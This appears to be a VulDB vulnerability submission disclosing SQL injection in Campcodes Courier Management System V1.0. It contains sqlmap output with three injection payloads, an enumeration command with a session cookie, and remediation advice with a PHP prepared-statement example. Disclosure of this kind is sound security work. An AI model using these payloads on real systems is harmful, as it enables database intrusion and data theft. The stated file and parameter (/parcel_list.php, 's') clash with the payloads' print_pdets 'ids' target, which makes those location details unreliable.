Submit #622322: Campcodes Courier Management System V1.0 SQL Injection

Title: Campcodes Courier Management System V1.0 SQL Injection
Description: Campcodes Courier Management System V1.0 /parcel_list.php SQL injection

NAME OF AFFECTED PRODUCT(S): Courier Management System
Vendor Homepage: https://www.campcodes.com/
AFFECTED AND/OR FIXED VERSION(S)
Submitter: mawenjie
Vulnerable File: /parcel_list.php
Version(s): V1.0
Software Link: https://www.campcodes.com/projects/php/courier-management-system/ and https://www.campcodes.com/downloads/courier-management-system-source-code/

PROBLEM TYPE
Vulnerability Type: SQL injection

Root Cause: A SQL injection vulnerability was found in "/parcel_list.php" of Courier Management System. The affected query can be attacked directly with blind injection: an attacker observes the application's response or other visible behaviour to determine whether an injected condition held, and can then probe and extract data from the database.

Impact: An attacker can exploit this SQL injection vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, take full control of the system, and even interrupt service, posing a serious threat to system security and business continuity.

DESCRIPTION: A SQL injection vulnerability has been discovered in "/parcel_list.php" of Courier Management System. The affected query can be attacked directly with blind injection: the attacker injects conditional statements and uses the application's Boolean-dependent behaviour to learn about the database content, trying different conditions and verifying each one from the application's response. When constructing the SQL query, the program uses the ID supplied by the user directly, without any validation or filtering, so arbitrary SQL queries can be executed by supplying a malicious id.

[Screenshot: https://github.com/user-attachments/assets/22d4780c-7c8d-44b6-85ca-0084fc50c5ea]

Vulnerability details and POC
Vulnerability location: 's' parameter
Payload:

```
sqlmap identified the following injection point(s) with a total of 283 HTTP(s) requests:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: http://192.168.126.133:8093/index.php?page=print_pdets&ids=(SELECT (CASE WHEN (1490=1490) THEN 5 ELSE (SELECT 1205 UNION SELECT 6489) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://192.168.126.133:8093/index.php?page=print_pdets&ids=5 AND (SELECT 2518 FROM(SELECT COUNT(*),CONCAT(0x71767a7071,(SELECT (ELT(2518=2518,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: http://192.168.126.133:8093/index.php?page=print_pdets&ids=5 OR (SELECT 1235 FROM (SELECT(SLEEP(5)))wyay)
---
```

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

```bash
python3 sqlmap.py -u "http://192.168.126.133:8093/index.php?page=print_pdets&ids=5*" --cookie PHPSESSID=1gtgbhgc1ei9ort2lvlrt4tod2 --dbs
```

[Screenshot: https://github.com/user-attachments/assets/aead93c8-2377-4ab8-afaa-e996a22ab04d]

Suggested repair
1. Use prepared statements and parameter binding: prepared statements prevent SQL injection because they separate SQL code from user input. With a prepared statement, the value entered by the user is treated purely as data and is never interpreted as SQL code.
2. Input validation and filtering: strictly validate and filter user input to ensure it conforms to the expected format.
3. Minimize database user permissions: ensure that the account used to connect to the database has only the minimum necessary permissions. Avoid using accounts with elevated permissions (such as 'root' or 'admin') for daily operations.
4. Regular security audits: regularly audit code and systems to promptly identify and fix potential security vulnerabilities.
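As an added example, not code from the Courier Management System, the following PHP applies repairs 1 to 3 to the pattern described above: the `ids` parameter is validated as a plain integer, then bound to a prepared statement. The `$pdo` connection, the `parcels` table, the `courier_app` account and the `COURIER_DB_PASSWORD` environment variable are assumptions, not names taken from the project.

```php
<?php
// Added example; table, column and account names are hypothetical.
declare(strict_types=1);

/**
 * Repair 2: validate the request parameter before it gets near SQL.
 * A parcel id is a positive integer, so anything else is rejected
 * with null instead of being passed through to the query.
 */
function parseParcelId(array $query): ?int
{
    $raw = $query['ids'] ?? null;
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/**
 * Repair 1: a prepared statement with the id bound as PDO::PARAM_INT.
 * MySQL receives the value as data, so it is never parsed as SQL.
 */
function fetchParcel(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM parcels WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Repair 3: connect as a low-privilege application account (hypothetical
// name), never as root, with the password taken from the environment.
$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=courier;charset=utf8mb4',
    'courier_app',
    getenv('COURIER_DB_PASSWORD') ?: '',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]
);

// Page handler: reject malformed ids before touching the database.
$id = parseParcelId($_GET);
if ($id === null) {
    http_response_code(400);
    exit('invalid parcel id');
}
$parcel = fetchParcel($pdo, $id);
```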
Source: https://github.com/XiaoJiesecqwq/CVE/issues/13
User: Anonymous User
Submission: 07/25/2025 09:31
Moderation: 07/26/2025 15:11 (1 day later)
Status: Accepted
VulDB entry: 317817 [Campcodes Courier Management System 1.0 /parcel_list.php sql injection]
Points: 20
